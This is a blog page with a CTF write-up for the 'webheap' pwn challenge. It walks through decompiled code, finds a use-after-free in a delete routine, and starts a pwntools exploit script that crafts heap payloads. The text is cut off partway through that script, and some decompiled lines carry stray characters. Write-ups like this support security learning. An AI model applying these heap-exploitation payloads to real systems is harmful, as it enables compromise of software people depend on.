<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Looking">
    <meta name="description" content="Looking up at the sky.🍬🍬🍓💕">
    <meta name="author" content="Jsjsj">
    
    <title>
        
            2022 Strong Network Mimic CTF PWN writeup |
        
        Jsjsj Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/log.jpg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"jsjsj.top","root":"/","language":"en","path":"search.json"}
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"style":{"primary_color":"#0066cc","logo":"/images/log.jpg","favicon":"/images/log.jpg","avatar":"/images/log.jpg","first_screen":{"enable":true,"background_img":"/images/bg.svg","description":null,"hitokoto":true},"scroll":{"progress_bar":true,"percent":true}},"local_search":{"enable":true,"preload":true},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"pjax":{"enable":false},"lazyload":{"enable":false},"comment":{"enable":true,"use":"valine","valine":{"appid":"aIJeYmBe1sYhsmeD0Wx4ImDN-MdYXbMMI","appkey":"Gk8i3b8sccXvUCUCkuapvLap","server_urls":"https://aijeymbe.api.lncldglobal.com","placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false}},"post":{"author_label":{"enable":true,"auto":true,"custom_label_list":["Trainee","Engineer","Architect"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"version":"3.8.6"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original article title","author":"Original article author","link":"Original article link"}
  </script>
<meta name="generator" content="Hexo 7.0.0-rc2"><link rel="alternate" href="/atom.xml" title="Jsjsj" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
</div>


<main class="page-container border-box">

    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/log.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               Jsjsj Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                HOME
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                ARCHIVES
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                TAGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                CATEGORIES
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                LINKS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                ABOUT
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/changelog"
                            >
                                CHANGELOG
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">HOME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">ARCHIVES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">TAGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">CATEGORIES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">LINKS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">ABOUT</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/changelog">CHANGELOG</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">

                

                    <div class="fade-in-down-animation">
    <div class="post-page-container border-box">

        <div class="article-content-container border-box">

            

            <div class="article-content-bottom border-box">
                
                    <div class="article-title">
                        2022 Strong Network Mimic CTF PWN writeup
                    </div>
                

                
                    <div class="article-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/log.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author">
                                <span class="name">Jsjsj</span>
                                
                                    <span class="author-label">Lv3</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="article-meta-info-container border-box post">
    <div class="article-meta-info border-box">
        


        
            <span class="meta-info-item article-create-date">
                <i class="icon fa-solid fa-calendar-check"></i>&nbsp;
                <span class="pc">2022-10-03 22:12:28</span>
                <span class="mobile">2022-10-03 22:12</span>
            </span>

            <span class="meta-info-item article-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="pc" data-updated="Tue Oct 03 2023 22:30:10 GMT+0800">2023-10-03 22:30:10</span>
            </span>
        

        
            <span class="meta-info-item article-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="article-category-ul">
                    
                            <li class="category-item"><a href="/categories/pwn/">pwn</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="article-tag meta-info-item border-box">
                <i class="icon fas fa-tags"></i>&nbsp;
                <ul class="article-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/pwn/">pwn</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="article-content keep-markdown-body">
                    

                    <h1 id="2022-Strong-Network-Mimic-CTF-PWN-writeup"><a href="#2022-Strong-Network-Mimic-CTF-PWN-writeup" class="headerlink" title="2022 Strong Network Mimic CTF PWN writeup"></a>2022 Strong Network Mimic CTF PWN writeup</h1><p><strong>Foreword: It was too difficult. I didn’t sign up for the competition. My teammates sent two questions, webpwn. At first, it felt like an httpd question. In the end, it took a long time to find out that it was a VM http web heap question. It took a long time to debug the inverse parameters. I’m too naive. I feel that if these two questions are understood inversely, it will be easy to do. It is mainly about the inverse parameters. Reverse flow for this problem</strong></p>
<p>According to the normal reverse thinking, first general audit, find the main function, in the main function, find the logic of each function, find the logic of each function, and then expand to see</p>
<h2 id="webheap"><a href="#webheap" class="headerlink" title="webheap:"></a>webheap:</h2><p>The main functions of this question are as follows</p>
<ol>
<li>When receiving and sending packets, mainly complete the sending of packets, but this function does not do any conversion</li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">sub_1999</span><span class="params">(__int64 a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int64 v1; <span class="comment">// rax</span></span><br><span class="line">  <span class="type">char</span> v2; <span class="comment">// bl</span></span><br><span class="line">  <span class="type">char</span> buf; <span class="comment">// [rsp+17h] [rbp-29h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+18h] [rbp-28h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 i; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v7; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  v7 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">std</span>::operator&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">&quot;Packet length: &quot;</span>);</span><br><span class="line">  <span class="built_in">std</span>::istream::operator&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cin</span>, &amp;v5);</span><br><span class="line">  <span class="keyword">if</span> ( v5 &gt; <span class="number">0x1000</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v1 = <span class="built_in">std</span>::operator&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;&gt;(&amp;stcd::<span class="built_in">cout</span>, <span class="string">&quot;The packet is too large&quot;</span>);</span><br><span class="line">    <span class="built_in">std</span>::ostream::operator&lt;&lt;(v1, &amp;<span class="built_in">std</span>::<span class="built_in">endl</span>&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;&gt;);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">std</span>::operator&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;&gt;(&amp;<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">&quot;Content: &quot;</span>);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;::allocator(&amp;buf);</span><br><span class="line">  <span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt;::basic_string(a1, v5, <span class="number">0LL</span>, &amp;buf);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;::~allocator(&amp;buf);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0LL</span>; i &lt; v5; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    read(<span class="number">0</span>, &amp;buf, <span class="number">1uLL</span>);</span><br><span class="line">    v2 = buf;</span><br><span class="line">    *(_BYTE *)<span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt;::operator[](a1, i) = v2;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> a1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol start="2">
<li><p>The second parameter is to accept and process the data sent, but the function here is very complicated, repeat the test and send, and then meet many conditions, it is recommended to combine dynamic debugging, because it is very complicated without dynamic debugging, I started There is no dynamic debugging, which leads to hard reading. The amount of code is very complicated. It is not recommended to hard reading. Here are the main functions to process data.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">sub_44E7</span><span class="params">(__int64 a1, __int64 opcode, __int64 a3)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> v5; <span class="comment">// [rsp+22h] [rbp-Eh] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int8 v6; <span class="comment">// [rsp+23h] [rbp-Dh]</span></span><br><span class="line">  <span class="type">char</span> v7[<span class="number">4</span>]; <span class="comment">// [rsp+24h] [rbp-Ch] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v8; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v8 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  readOpcode1((__int64)v7, (<span class="built_in">std</span>::istream *)a3, &amp;v5);c</span><br><span class="line">  <span class="title function_">if</span> <span class="params">( (<span class="type">unsigned</span> __int8)sub_2468((__int64)v7) != <span class="number">1</span> )</span></span><br><span class="line">  &#123;</span><br><span class="line">    sub_2442(a1, (__int64)v7);</span><br><span class="line">  &#125;</span><br><span class="line">  elsec</span><br><span class="line">  &#123;</span><br><span class="line">    v6 = v5;</span><br><span class="line">    <span class="keyword">if</span> ( sub_3415(v5) )                         <span class="comment">// v5为0xB9</span></span><br><span class="line">      sub_442A(a1, v6, opcode, a3);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">      set_error(a1, <span class="number">1u</span>);                        </span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> a1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ol>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">bool</span> __fastcall <span class="title function_">sub_3415</span><span class="params">(<span class="type">char</span> a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> a1 == (<span class="type">char</span>)<span class="number">0xB9</span>;   Check that the byte of the first packet must be <span class="number">0xB9</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">__int64 __fastcall <span class="title function_">sub_442A</span><span class="params">(__int64 a1, __int64 a2, __int64 opcode, __int64 a4)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> v7[<span class="number">4</span>]; <span class="comment">// [rsp+2Ch] [rbp-14h] BYREF</span></span><br><span class="line">  __int64 v8[<span class="number">2</span>]; <span class="comment">// [rsp+30h] [rbp-10h] BYREF</span></span><br><span class="line"></span><br><span class="line">  v8[<span class="number">1</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v8[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line">  readOpcode2((__int64)v7, (__int64)v8, (<span class="built_in">std</span>::istream *)a4);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">unsigned</span> __int8)sub_2468((__int64)v7) != <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    sub_2442(a1, (__int64)v7);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( v8[<span class="number">0</span>] == <span class="number">5</span> )c</span><br><span class="line">  &#123;</span><br><span class="line">    sub_4397(a1, opcode, a4);   <span class="comment">//再次发送必须第二个数据要为5</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    set_error(a1, <span class="number">5u</span>);                         </span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> a1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">_DWORD *__fastcall <span class="title function_">chuanschuli</span><span class="params">(_DWORD *a1, <span class="type">unsigned</span> __int8 a2, _QWORD *a3, __int64 a4)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">switch</span> ( a2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x80</span>u:</span><br><span class="line">      sub_3427(a1, a3, a4);                     <span class="comment">// 1bytes</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x81</span>:</span><br><span class="line">      sub_34D0(a1, a3, a4);                     <span class="comment">// 2bytes</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x82</span>:</span><br><span class="line">      sub_357B(a1, a3, a4);                     <span class="comment">// 4bytes</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x83</span>:</span><br><span class="line">      sub_3625(a1, a3, a4);                     <span class="comment">// 5bytes</span></span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">      *a3 = a2;</span><br><span class="line">      *a1 = <span class="number">0</span>;</span><br><span class="line">      no_error((__int64)a1);</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> a1;  This is mainly to determine the data determined by the transmission parameters</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Probably the process has been reversed, and the next step is to combine gdb-pwndbg to carry out the next step. It is extremely complicated here, and debugging has been adjusted all morning.</p>
<p>After all the parameters are constructed, the next step is to directly find holes to play</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 __fastcall <span class="title function_">sub_18A3</span><span class="params">(__int64 a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> op; <span class="comment">// [rsp+14h] [rbp-4Ch]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 idx; <span class="comment">// [rsp+18h] [rbp-48h]</span></span><br><span class="line">  <span class="type">char</span> v4[<span class="number">40</span>]; <span class="comment">// [rsp+30h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+58h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  op = *(_DWORD *)a1;</span><br><span class="line">  idx = *(_QWORD *)(a1 + <span class="number">8</span>);</span><br><span class="line">  <span class="keyword">if</span> ( *(_DWORD *)a1 == <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    show(idx);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( op &gt; <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( op == <span class="number">2</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      del(idx);                                 <span class="comment">// uaf</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( op == <span class="number">3</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt;::basic_string(v4, a1 + <span class="number">24</span>);</span><br><span class="line">      edit(idx, (__int64)v4);</span><br><span class="line">      <span class="built_in">std</span>::__cxx11::basic_string&lt;<span class="type">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="type">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="type">char</span>&gt;&gt;::~basic_string(v4);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( !op )</span><br><span class="line">  &#123;</span><br><span class="line">    add(idx, *(_QWORD *)(a1 + <span class="number">0x10</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>In fact, this heap vulnerability is in del, del:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> __fastcall <span class="title function_">sub_17EF</span><span class="params">(<span class="type">unsigned</span> __int64 a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> ( a1 &gt; <span class="number">0xF</span> )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  <span class="built_in">free</span>((<span class="type">void</span> *)ptr_list[a1]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>After discovering the UAF, you can directly follow the conventional ideas. You can find a way to write the parameters of the functions such as add, show, and edit through dynamic debugging and reverse analysis. In fact, the previous reverse process takes a lot of time, but the reverse understands the parameters and finds it. The hole was punched directly, it took 15 minutes</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&quot;./webheap&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;webheap&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;/home/roo/Desktop/tools/glibc-all-in-one-master/libs/2.27-3ubuntu1.5_amd64/libc.so.6&quot;</span>)</span><br><span class="line">se      = <span class="keyword">lambda</span> data               :p.send(data) </span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">sea     = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">rc      = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :p.recv(numb)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>, <span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>, <span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">info_addr = <span class="keyword">lambda</span> tag, addr        :p.info(tag + <span class="string">&#x27;: &#123;:#x&#125;&#x27;</span>.<span class="built_in">format</span>(addr))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx,size,content=<span class="string">&#x27;jsjjs&#x27;</span></span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x83&#x27;</span>+p64(size)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x83&#x27;</span>+p64(<span class="built_in">len</span>(content))</span><br><span class="line">    payload+=<span class="built_in">str</span>(content)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">2</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x80&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: 